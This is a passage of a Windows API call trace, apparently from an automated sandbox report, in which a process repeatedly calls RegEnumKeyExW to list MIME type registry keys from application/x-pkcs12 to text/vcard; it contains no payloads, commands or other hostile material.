lpftLastWriteTime=0x0 | out: lpName="application/x-mswebsite", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x60, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-pkcs12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x61, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-pkcs7-certificates", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x62, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-pkcs7-certreqresp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x63, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-shockwave-flash", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x64, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-stuffit", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x65, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-tar", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x66, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-troff-man", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x67, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-vnd.google.oneclickctrl.9", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x68, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-vnd.google.update3webcontrol.3", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x69, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-wmplayer", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x6a, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-x509-ca-cert", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x6b, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-zip-compressed", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x6c, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/xaml+xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x6d, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/xhtml+xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x6e, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x6f, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/zip", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x70, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/3gpp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x71, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/3gpp2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x72, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/aac", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x73, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/aiff", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x74, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/amr", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x75, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/basic", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x76, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/ec3", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.301] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x77, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/l16", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x78, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/mid", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x79, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/midi", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x7a, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/mp3", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x7b, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/mp4", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x7c, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/MP4A-LATM", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x7d, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/mpeg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x7e, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/mpegurl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x7f, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/mpg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x80, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/vnd.dlna.adts", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x81, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/vnd.dolby.dd-raw", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x82, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/wav", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x83, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-aiff", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x84, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-flac", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x85, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-m4a", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x86, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-m4r", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x87, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-matroska", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x88, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-mid", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x89, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-midi", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.302] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x8a, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-mp3", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x8b, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-mpeg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x8c, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-mpegurl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x8d, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-mpg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x8e, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-ms-wax", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x8f, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-ms-wma", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x90, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="audio/x-wav", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x91, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/bmp", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x92, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/gif", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x93, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/jpeg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x94, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/pjpeg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x95, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/png", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x96, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/svg+xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x97, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/tiff", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.303] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x98, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/vnd.ms-dds", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x99, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/vnd.ms-photo", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x9a, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/x-emf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x9b, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/x-icon", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x9c, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/x-jg", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x9d, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/x-png", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x9e, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="image/x-wmf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x9f, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="message/rfc822", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa0, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="midi/mid", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa1, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="model/vnd.dwfx+xps", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa2, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="model/vnd.easmx+xps", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa3, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="model/vnd.edrwx+xps", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa4, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="model/vnd.eprtx+xps", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa5, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="pkcs10", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa6, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="pkcs7-mime", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.304] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa7, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="pkcs7-signature", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa8, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="pkix-cert", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa9, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="pkix-crl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xaa, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/calendar", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xab, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/css", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xac, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/directory", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xad, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/directory;profile=vCard", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xae, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/html", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xaf, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/plain", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb0, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/scriptlet", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb1, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="text/vcard", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.305] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb2, 